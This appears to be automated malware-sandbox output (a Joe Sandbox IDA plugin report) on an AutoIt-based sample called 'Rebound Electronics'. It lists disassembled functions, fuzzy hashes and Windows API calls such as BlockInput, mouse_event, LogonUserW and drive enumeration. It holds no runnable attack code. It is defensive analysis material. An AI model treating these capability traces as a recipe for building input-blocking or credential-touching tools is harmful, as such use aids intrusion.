Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8611c5d8cf3e1b503ab9911718194d8464b60eb113ea711a7a547e90a4dc61f
Instruction ID: e2345ac20a3d1b2262f03d00b79bf709f2fb9415d83ebba7cc062cb8e9f4c74f
Opcode Fuzzy Hash: e8611c5d8cf3e1b503ab9911718194d8464b60eb113ea711a7a547e90a4dc61f
Instruction Fuzzy Hash: 59B1D230D2AF414DD723A639987133AB65CAFBB2D5F91D71BFC1A74D62EB2285834180

Function 00C6B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00C6B6DF

Part of subcall function 00C4344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00C6BDC3,00000000,?,?,?,?,00C6BF70,00000000,?), ref: 00C43453
Part of subcall function 00C4344A: __aulldiv.LIBCMT ref: 00C43473

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 6eacd56063ae39da3114cd45e2286a63e9cb2da79f87f86fe2763362a8e2982f
Instruction ID: aff04d888d2fb8ac9ae1ba9cc771c3acc04411c21e8e09a89a3725a0ac778e0e
Opcode Fuzzy Hash: 6eacd56063ae39da3114cd45e2286a63e9cb2da79f87f86fe2763362a8e2982f
Instruction Fuzzy Hash: 70216D726345508BC729CF28C881B96B7E1EB95320B248E6DE4E5CF2D0CB74BE46DB54

Function 00C76AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00C76ACA

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 988f9c3e1cdf67871bb7a55d9559fb7cbb40cf222fe28610b8ed7e88fd9498ea
Instruction ID: fb459e3ab859f081abb795693274b699c731084c14d89f1788dd1d04e0ef5ea7
Opcode Fuzzy Hash: 988f9c3e1cdf67871bb7a55d9559fb7cbb40cf222fe28610b8ed7e88fd9498ea
Instruction Fuzzy Hash: F0E04835210214AFD700EF59E404E5AB7ECAF74765F04C816F94AD7651DAB0F8449BA0

Function 00C674E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00C6750A

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 87bbc617bfc4420ebe734285c7160d430d4f4cab92ba7acacbc58c1dd1e7c578
Instruction ID: 4839d728f0269b52d4c16ead748e1a23a7046ca91db2c6a98e63f2b9199d579b
Opcode Fuzzy Hash: 87bbc617bfc4420ebe734285c7160d430d4f4cab92ba7acacbc58c1dd1e7c578
Instruction Fuzzy Hash: 3CD09EA416C60579EC3A47259C9FFBB1508F341789FD44F897613D90C0ECD45E41B431

Function 00C5B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00C5AD3E), ref: 00C5B124

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 0742eb399b906bc10593045e226bc1158b852bf283a7b8f917caa429f14d972c
Instruction ID: 119eaa42e485ede7450221d126bb0f11ca5344f2a60a94bc65ef39ccfab75e66
Opcode Fuzzy Hash: 0742eb399b906bc10593045e226bc1158b852bf283a7b8f917caa429f14d972c
Instruction Fuzzy Hash: 3AD05E320A460EAEDF024FA4DC02FAE3F6AEB04700F408110FA12C60A0C671D531AB50

Function 00C9B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 00C9B352

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 85be01c024fa1584c0a14b553b77660398401cd24294d962e378e7f51add172b
Instruction ID: 767d514cafb745f8a42856d9975bf2131fefa1f45b434efca5cadcbc07e80fcf
Opcode Fuzzy Hash: 85be01c024fa1584c0a14b553b77660398401cd24294d962e378e7f51add172b
Instruction Fuzzy Hash: D3C04CB1400109DFCB51CBC4C948AEEB7BCAB04305F104091A107F2110D7709B859B72

Function 00C48189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00C4818F

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4d447c73545e4fa9e1db7074256353ef5a93cbea7eb238ae564355a76aecdbae
Instruction ID: 616c11d319aaca418f39359e76b4e60c63c1891fc3696072ab60be64393aded5
Opcode Fuzzy Hash: 4d447c73545e4fa9e1db7074256353ef5a93cbea7eb238ae564355a76aecdbae
Instruction Fuzzy Hash: 26A0113000020CAB8F002B82EC08A8C3F2CEA022A8B000020F80E028308B22A8A08A82

Function 00C2E3B0 Relevance: .5, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47cecaf0e61b4225e516c0625049fe3a6a3a40aa0b27100f4a5dfbe7cd9a3fda
Instruction ID: e0484a42794de6b89b107994ecd894e14dadced22a220a8cb15b7d9e18061be6
Opcode Fuzzy Hash: 47cecaf0e61b4225e516c0625049fe3a6a3a40aa0b27100f4a5dfbe7cd9a3fda
Instruction Fuzzy Hash: 9722C074910229CFDB24DF58D484BAEB7B0FF14300F148169E99AAB751E731AE81DB91

Function 00C293F0 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47d72d32b4c360e41bb9b279c3f5f12f7ebbdc5d97f4d0eba29aa3540826bada
Instruction ID: f04bdff22d22a8bdd0de52481321828cc116668014d585317584a68bc8e32e9e
Opcode Fuzzy Hash: 47d72d32b4c360e41bb9b279c3f5f12f7ebbdc5d97f4d0eba29aa3540826bada
Instruction Fuzzy Hash: 38129E70A00219EFDF04DFA5E985AEEB7F5FF48300F204529E856E7690EB35AA11DB50

Function 00C2AF50 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: 155965ec2ef5f327f972e07701cd6653c38e9e398a77d86eb88eb2bccc4a1657
Instruction ID: d76bba074a17b2b284c382f29a4817f6bef1d5e4f4410fa0053a220e425479ca
Opcode Fuzzy Hash: 155965ec2ef5f327f972e07701cd6653c38e9e398a77d86eb88eb2bccc4a1657
Instruction Fuzzy Hash: 3002B1B0A00215EBCF14DF68E995AAEBBF5FF44300F108469E846DB295EB31DE11DB91

Function 00C402A4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: b50f51ad7d94cdaf47dd5e5c0a4830d8523ebf31d0b382102e8e5c86bfe164ff
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: E5C1B7322451930ADF2D463A843453EFBA16EA17B172A176DD8B3CB4D5EF30CA25E620

Function 00C406D9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: 0c685be0ab5fe55992614be7ccb0ee151502e57850a62b18a04963ff1b6d5ec6
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: 46C1C63324519309DF6D463AC43453EBBA16EA2BB172A076DD4B3CB4D5EF30DA24E620

Function 00C3FA57 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: b33d1e25e999447971f19dc02ec6f9f2cc3f874267cbdc5947a8c81aadfb2bdd
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: B1C1D83261509309DF2D463AC43443EFBA15EA17B5B1A1B7DD4B3CB5D5EF20CA26D620

Function 00C7A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00C7A2FE
DeleteObject.GDI32(00000000), ref: 00C7A310
DestroyWindow.USER32 ref: 00C7A31E
GetDesktopWindow.USER32 ref: 00C7A338
GetWindowRect.USER32(00000000), ref: 00C7A33F
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00C7A480
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00C7A490
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C7A4D8
GetClientRect.USER32(00000000,?), ref: 00C7A4E4
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C7A51E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C7A540
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C7A553
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C7A55E
GlobalLock.KERNEL32(00000000), ref: 00C7A567
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C7A576
GlobalUnlock.KERNEL32(00000000), ref: 00C7A57F
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C7A586
GlobalFree.KERNEL32(00000000), ref: 00C7A591
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C7A5A3
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00CAD9BC,00000000), ref: 00C7A5B9
GlobalFree.KERNEL32(00000000), ref: 00C7A5C9
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00C7A5EF
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00C7A60E
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C7A630
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C7A81D

Strings

DISPLAY, xrefs: 00C7A680
, xrefs: 00C7A7A3
AutoIt v3, xrefs: 00C7A4D0
static, xrefs: 00C7A518, 00C7A66F

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 04cee27174b5e7e24a75e2336f51cf7722b2472b8bfc1d975cb0362b4e0207c8
Instruction ID: e1240cd86fcca0a3b46c176715bd80f267e571bc60494803c18c444de4275bd8
Opcode Fuzzy Hash: 04cee27174b5e7e24a75e2336f51cf7722b2472b8bfc1d975cb0362b4e0207c8
Instruction Fuzzy Hash: E7025A71A00254EFDB14DFA4DD89FAE7BB9EB49314F048158F91AAB2A0C770ED41CB61

Function 00C8D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00C8D2DB
GetSysColorBrush.USER32(0000000F), ref: 00C8D30C
GetSysColor.USER32(0000000F), ref: 00C8D318
SetBkColor.GDI32(?,000000FF), ref: 00C8D332
SelectObject.GDI32(?,00000000), ref: 00C8D341
InflateRect.USER32(?,000000FF,000000FF), ref: 00C8D36C
GetSysColor.USER32(00000010), ref: 00C8D374
CreateSolidBrush.GDI32(00000000), ref: 00C8D37B
FrameRect.USER32(?,?,00000000), ref: 00C8D38A
DeleteObject.GDI32(00000000), ref: 00C8D391
InflateRect.USER32(?,000000FE,000000FE), ref: 00C8D3DC
FillRect.USER32(?,?,00000000), ref: 00C8D40E
GetWindowLongW.USER32(?,000000F0), ref: 00C8D439

Part of subcall function 00C8D575: GetSysColor.USER32(00000012), ref: 00C8D5AE
Part of subcall function 00C8D575: SetTextColor.GDI32(?,?), ref: 00C8D5B2
Part of subcall function 00C8D575: GetSysColorBrush.USER32(0000000F), ref: 00C8D5C8
Part of subcall function 00C8D575: GetSysColor.USER32(0000000F), ref: 00C8D5D3
Part of subcall function 00C8D575: GetSysColor.USER32(00000011), ref: 00C8D5F0
Part of subcall function 00C8D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C8D5FE
Part of subcall function 00C8D575: SelectObject.GDI32(?,00000000), ref: 00C8D60F
Part of subcall function 00C8D575: SetBkColor.GDI32(?,00000000), ref: 00C8D618
Part of subcall function 00C8D575: SelectObject.GDI32(?,?), ref: 00C8D625
Part of subcall function 00C8D575: InflateRect.USER32(?,000000FF,000000FF), ref: 00C8D644
Part of subcall function 00C8D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C8D65B
Part of subcall function 00C8D575: GetWindowLongW.USER32(00000000,000000F0), ref: 00C8D670
Part of subcall function 00C8D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C8D698

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: ff10ef92644141e1b1ebef034a8ac48aac8bd7ec21559ed6391b49e60120eaf0
Instruction ID: 1b94bab8622f7d8674871fef7ae274ec2212e50d839a952e3cde73eff819e333
Opcode Fuzzy Hash: ff10ef92644141e1b1ebef034a8ac48aac8bd7ec21559ed6391b49e60120eaf0
Instruction Fuzzy Hash: 57916DB1408301AFDB10AF64DC48B6FBBA9FB86329F100A19F963975E0D771D945CB52

Function 00C3B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00C3B98B
DeleteObject.GDI32(00000000), ref: 00C3B9CD
DeleteObject.GDI32(00000000), ref: 00C3B9D8
DestroyIcon.USER32(00000000), ref: 00C3B9E3
DestroyWindow.USER32(00000000), ref: 00C3B9EE
SendMessageW.USER32(?,00001308,?,00000000), ref: 00C9D2AA
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C9D2E3
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00C9D711

Part of subcall function 00C3B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C3B759,?,00000000,?,?,?,?,00C3B72B,00000000,?), ref: 00C3BA58

SendMessageW.USER32 ref: 00C9D758
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C9D76F
ImageList_Destroy.COMCTL32(00000000), ref: 00C9D785
ImageList_Destroy.COMCTL32(00000000), ref: 00C9D790

Strings

0, xrefs: 00C9D5A5

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 92c16332da68622514316e3fa7c123c6f06e4ad565fe026b0e94b224d064acad
Instruction ID: 417273dd0bbaec167ca8d4a1cb699915050b70e2cbb367da8f9acc5a2e69293b
Opcode Fuzzy Hash: 92c16332da68622514316e3fa7c123c6f06e4ad565fe026b0e94b224d064acad
Instruction Fuzzy Hash: F5128B70204201DFDB21CF28C888BA9BBF5BF45304F144569FA9AEB662C731ED42DB91

Function 00C6DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C6DBD6
GetDriveTypeW.KERNEL32(?,00CBDC54,?,\\.\,00CBDC00), ref: 00C6DCC3
SetErrorMode.KERNEL32(00000000,00CBDC54,?,\\.\,00CBDC00), ref: 00C6DE29

Strings

RAMDisk, xrefs: 00C6DCED
ATAPI, xrefs: 00C6DD9A
RAID, xrefs: 00C6DDC4
SCSI, xrefs: 00C6DD93
Fixed, xrefs: 00C6DD0B
ATA, xrefs: 00C6DDA1
1394, xrefs: 00C6DDA8
FileBackedVirtual, xrefs: 00C6DDF5
MMC, xrefs: 00C6DDE7
Fibre, xrefs: 00C6DDB6
Removable, xrefs: 00C6DD15
PhysicalDrive, xrefs: 00C6DC67
Network, xrefs: 00C6DD01
SSA, xrefs: 00C6DDAF
\\.\, xrefs: 00C6DC2B
Virtual, xrefs: 00C6DDEE
Unknown, xrefs: 00C6DCE3, 00C6DD8C
CDROM, xrefs: 00C6DCF7
SATA, xrefs: 00C6DDD9
USB, xrefs: 00C6DDBD
SAS, xrefs: 00C6DDD2
iSCSI, xrefs: 00C6DDCB
SSD, xrefs: 00C6DD50

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
